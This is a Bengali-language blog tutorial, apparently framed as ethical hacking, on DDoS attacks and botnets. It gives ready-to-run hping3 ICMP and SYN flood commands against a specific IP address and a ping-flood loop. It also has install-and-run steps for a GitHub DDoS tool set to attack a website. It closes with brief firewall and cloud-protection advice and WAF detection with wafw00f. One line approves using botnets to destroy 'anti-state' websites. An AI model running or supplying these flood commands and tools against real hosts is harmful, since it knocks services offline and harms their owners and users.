DDOS Ping ICMP Flood & DDOS SYN Flood Attack

DDoS (ডিডস) কাকে বলে?

ডিস্ট্রিবিউটেড ডিনায়েল অফ সার্ভিস বা ডিডস হলো মাল্টিপল ডিভাইস ইউজ করে একটি সেম টার্গেটে অ্যাটাক করা। ডস অ্যাটাক যেখানে একটি সিস্টেম ইউজ করে করা হয় কিংবা একজন হ্যাকার কাজটি করে, সেখানে ডিডস অ্যাটাকে অনেকগুলো ডিভাইস ইউজ করা হয়, বা কয়েকজন হ্যাকার মিলে কাজটা করে।
ধরুন আপনার একটি Business ওয়েবসাইট আছে। সেখানে আপনি বিভিন্ন পণ্য/সেবা বিক্রি করেন এবং অনেক কাস্টমার আপনার এই সার্ভিস ইউজ করে। এ কারনে উক্ত ওয়েবসাইট পরিচালনার জন্য আপনি অনেক বেশি স্পেস এবং ব্যান্ডউইথ সহ হোস্টিং কিনলেন। কোন কারনে আপনার ওয়েবসাইট কোন হ্যাকারের খারাপ নজরে এলো। সে যদি আপনার ওয়েবসাইট স্লো বা অফলাইন করে দিতে চায় তাহলে তাকে ডিডস অ্যাটাকের সাহায্য নিতে হবে। আর এভাবে ওয়েবসাইটটির ব্যান্ডউইথ নষ্ট করে দিয়ে ওয়েবসাইটটিকে সার্ভার থেকে বিচ্ছিন্ন করে ফেলে এবং কেউ ওয়েবসাইটটিতে আর ভিজিট করতে পারেনা।

BotNet/ বটনেট “ জম্বি নেটওয়ার্ক”?

এটা করার জন্য হ্যাকাররা বটনেট বা জম্বি নেটওয়ার্ক ব্যবহার করে, যার মাধ্যমে সহজেই একটি সার্ভারে অনেক সংখ্যক রিকোয়েস্ট পাঠানো যায়, জমি নেটওয়ার্ক একটি Infected ম্যালওয়্যার। বটনেট কনফিগারেশনের কারনে হ্যাকার রিমোটলি টার্গেট সেট করে উক্ত ডিভাইসকে আর্মি হিসেবে ইউজ করতে পারে।
তবে, সিঙ্গেল অ্যাটাকের থেকে বটনেট ইউজ করে অ্যাটাক পরিচালনা করলে একই সাথে গিগাবাইট থেকে টেরাবাইট ইন্টারনেট ট্র্যাফিক সেন্ড করা সম্ভব, যা ওয়েবসাইটের সমস্ত ব্যান্ডউইথ কে নষ্ট করে দিতে পারে। এধরণের শক্তিশালী অ্যাটাক প্রতিহত করাও অনেক কষ্টকর এবং ব্যায়বহুল হয়ে থাকে। বট নেট দিয়ে সমাজ/ রাষ্ট্র বিরোধী ওয়েবসাইটগুলো সহজে ধ্বংস করা যায়।

Before Attack Check Server Response Time

let’s check server response time : kali(cmd) ping www.minhazulasif.me

DDOS Ping ICMP FLOOD – Attck a Server USing hPing3

sudo hping3 -1 –flood 148.163.80.131

Try overwhelmed the server with multiple request and see the server response time

DDOS SYN FLOOD ATTACK

– Using TCP we connect with a server (say port is 80)

sudo hping3 -d 200 –flood 148.163.80.131

– d = packet (byte) –flood = huge request, p = port

Ping Of Death

> nslookup www.targetdomain.com
> get the ip address
> ping ip -t -n 10000 -w 1

Terms:
-t = Pings the specified host until stopped.
-l = buffer size
-n = Count Number of echo requests
-w 1 = wait of second for each reply

DDos Attack In Kali (RDDoS_Tool)

Github Link: https://github.com/Red-company/RDDoS_Tool

apt-get update -y
apt-get install git
git clone https://github.com/Red-company/RDDoS_Tool.git
cd RDDoS_Tool
bash setup.sh
python3 RDDoS_Tool.py

If there are troubles :
pip install tqdm
pip install pyfiglet

Then choose 1 for website attack & put the domain name

কিভাবে ডস বা ডিডস অ্যাটাক থেকে সুরক্ষিত থাকা যায়?

ডিডস অ্যাটাক থেকে সুরক্ষা পেতে অনেক গুলো পেইড এবং স্ট্রং ফায়ারওয়াল ব্যবহার করতে হবে। ছোট এবং মাঝারী অ্যাটাক প্রতিহত করার জন্য ফায়ারওয়াল সার্ভিস অনেক কার্যকর।
ফায়ারওয়াল এর মাধ্যমে, সিস্টেম থেকে অতিরিক্ত রিকোয়েস্ট বা ট্র্যাফিক আসতেছে তা সহজেই বের করা যায়। উক্ত আইপি ব্লক করে দিলেই অ্যাটাক বন্ধ হয়ে যায়। আর অনেকগুলো হ্যাকার যখন নির্দিষ্ট একটি নেটওয়ার্কে অ্যাটাক করে তখন সেই হ্যাকারদের লোকেশন বা কান্ট্রি ব্লক করে দিলে এই ধরনের অ্যাটাক থেকে সুরক্ষিত থাকা যায়।

এছাড়া বড় ধরনের অ্যাটাক প্রতিহত করার জন্য ক্লাউড নির্ভর সার্ভিস যেমন Cloudflare, Sucuri firewall, AWS Shield, Project Shield, Wordfence ইত্যাদি অনেক ভালো কাজ করে। সুতরাং ডিডস অ্যাটাক থেকে আপনার সার্ভিসকে সুরক্ষা দিতে চাইলে এসব সার্ভিস অবশ্যই ব্যবহার করবেন।
DDoS অ্যাটাক অবশ্য একটি শাস্তিযোগ্য অপরাধ, আমরা সবাই DDoS অ্যাটাক সম্পর্কে জানবো এবং নিজেদের সুরক্ষা নিশ্চিত করবো। কারো ক্ষতির জন্য এটি ব্যবহার করব না।

Check Firewall/ WAF exist in a site or not

in kali > wafw00f
> wafw00f -l (To see the waf list)
> wafw00f minhazulasif.me (To check filewall exist or not)

Read more bloghs on ethical hacking from here.